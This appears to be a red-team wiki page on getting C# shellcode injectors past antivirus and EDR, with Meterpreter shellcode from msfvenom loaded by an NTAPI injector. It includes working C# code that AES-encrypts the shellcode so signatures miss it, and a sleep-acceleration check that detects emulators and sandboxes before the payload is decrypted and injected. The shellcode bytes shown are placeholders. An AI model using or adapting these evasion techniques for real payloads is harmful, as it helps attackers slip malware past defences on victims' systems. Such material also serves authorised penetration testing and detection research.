Evasion and bypassing detection within C#
Overview
AV and EDR bypass techniques for C# assembly payloads.
Experiment
In this experiment we use the NTAPI injector as our baseline, with the shellcode generated by msfvenom (see the page linked below).
Using NTAPI Undocumented Functions
(Screenshot: Msfvenom payload)
Injector without any shellcode
For the baseline we ran the injector with no shellcode in the payload buffer, to confirm that the injector code itself is not what gets flagged.
Raw Meterpreter payload shellcode
Running the injector with raw, unencrypted Meterpreter shellcode embedded in the assembly.
Using AES encryption
Encrypting the embedded shellcode with AES so that the raw Meterpreter bytes never appear in the assembly on disk; the blob is decrypted in memory immediately before injection.
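The following is an added example, not the encryptor shown on this page: a small AES-256-CBC helper that encrypts the msfvenom output at build time, prints it in the same `byte[] buf = new byte[N] { ... };` shape that `msfvenom -f csharp` produces, and decrypts it again the way the injector would at run time. The shellcode bytes, key and IV below are constructed placeholders (a NOP sled ending in `ret`), not a real payload.

```csharp
using System;
using System.IO;
using System.Linq;
using System.Security.Cryptography;

// Added example: AES-256-CBC wrapper for shellcode. Not the page's own code.
class ShellcodeCrypto
{
    public static byte[] Encrypt(byte[] plaintext, byte[] key, byte[] iv)
    {
        using (Aes aes = Aes.Create())
        {
            aes.Mode = CipherMode.CBC;
            aes.Padding = PaddingMode.PKCS7;
            aes.Key = key;   // 32 bytes selects AES-256
            aes.IV = iv;     // 16 bytes, one AES block
            using (ICryptoTransform enc = aes.CreateEncryptor())
            using (MemoryStream ms = new MemoryStream())
            {
                using (CryptoStream cs = new CryptoStream(ms, enc, CryptoStreamMode.Write))
                {
                    cs.Write(plaintext, 0, plaintext.Length);
                    cs.FlushFinalBlock();
                }
                return ms.ToArray();
            }
        }
    }

    // Run-time side: decrypt in memory right before handing the buffer to the injector.
    public static byte[] Decrypt(byte[] ciphertext, byte[] key, byte[] iv)
    {
        using (Aes aes = Aes.Create())
        {
            aes.Mode = CipherMode.CBC;
            aes.Padding = PaddingMode.PKCS7;
            aes.Key = key;
            aes.IV = iv;
            using (ICryptoTransform dec = aes.CreateDecryptor())
            using (MemoryStream ms = new MemoryStream())
            {
                using (CryptoStream cs = new CryptoStream(ms, dec, CryptoStreamMode.Write))
                {
                    cs.Write(ciphertext, 0, ciphertext.Length);
                    cs.FlushFinalBlock();
                }
                return ms.ToArray();
            }
        }
    }

    // Emit the array in msfvenom's C# format so the encrypted blob, key and IV
    // can be pasted straight into the injector source.
    public static string ToCSharpArray(string name, byte[] data)
    {
        return "byte[] " + name + " = new byte[" + data.Length + "] { " +
               string.Join(",", data.Select(b => "0x" + b.ToString("x2"))) + " };";
    }

    static void Main()
    {
        // Constructed placeholder standing in for msfvenom output: NOPs then ret.
        byte[] shellcode = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0xc3 };
        byte[] key = new byte[32];
        byte[] iv = new byte[16];
        using (RandomNumberGenerator rng = RandomNumberGenerator.Create())
        {
            rng.GetBytes(key);
            rng.GetBytes(iv);
        }

        byte[] encrypted = Encrypt(shellcode, key, iv);
        Console.WriteLine(ToCSharpArray("buf", encrypted));
        Console.WriteLine(ToCSharpArray("key", key));
        Console.WriteLine(ToCSharpArray("iv", iv));

        // Round-trip check: what the injector decrypts must equal the original bytes.
        byte[] roundTrip = Decrypt(encrypted, key, iv);
        Console.WriteLine("round-trip ok: " + roundTrip.SequenceEqual(shellcode));
    }
}
```

Because the key and IV end up embedded in the same assembly, this defeats only static signature matching on the payload bytes; anyone who can read the binary can recover the plaintext, and, as the next section shows, Defender's behavioral analysis does not need the bytes on disk at all.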
(Screenshot: AES encryptor)
Run it twice and Defender is not so nice
Interestingly, on the second execution Defender's behavioral analysis flagged and blocked the binary, even though the same AES-encrypted payload had not been blocked the first time.
Adding a sleep-acceleration check (sleep for a fixed interval and compare it with the time that actually elapsed; an emulator that fast-forwards Sleep returns far too early) before decrypting and injecting was enough to get past this on the second run as well.
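An added example of the sleep-acceleration check described above; it is not the code used on this page. The check sleeps for a fixed interval and measures the elapsed time on two independent clocks (Stopwatch, backed by QueryPerformanceCounter, and DateTime.UtcNow, backed by system time), so an emulator that fakes only one of them is still caught. The 5-second interval and the 90 % tolerance are assumptions chosen for illustration.

```csharp
using System;
using System.Diagnostics;
using System.Threading;

// Added example: bail out before decrypting or injecting if Sleep was skipped.
// Emulators and sandboxes commonly patch Sleep to return immediately so the
// sample reaches its payload quickly; comparing the requested interval with the
// time that actually elapsed exposes that.
class SleepAccelerationCheck
{
    public static bool SleepWasAccelerated(int sleepMs)
    {
        DateTime wallStart = DateTime.UtcNow;
        Stopwatch sw = Stopwatch.StartNew();

        Thread.Sleep(sleepMs);

        sw.Stop();
        double wallElapsed = (DateTime.UtcNow - wallStart).TotalMilliseconds;

        // A genuine Sleep may overshoot because of scheduling, but it never
        // returns far early. 90 % of the requested interval is the assumed floor.
        double minimum = sleepMs * 0.9;
        return sw.ElapsedMilliseconds < minimum || wallElapsed < minimum;
    }

    static void Main()
    {
        const int interval = 5000; // 5 s: long enough that skipping it is measurable

        if (SleepWasAccelerated(interval))
        {
            // Clock ran fast: most likely an emulator. Exit quietly and leave the
            // encrypted blob untouched so nothing decrypts into memory.
            return;
        }

        Console.WriteLine("Sleep ran for the full interval; proceeding to decrypt and inject.");
        // From here the baseline NTAPI injector (linked under References) takes over.
    }
}
```

Place the check before the AES decryption, not after it: the point is that the decrypted Meterpreter bytes never exist in the process while the emulator is watching.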
(Screenshot: Time accelerated checks)
References
C# .Net Assembly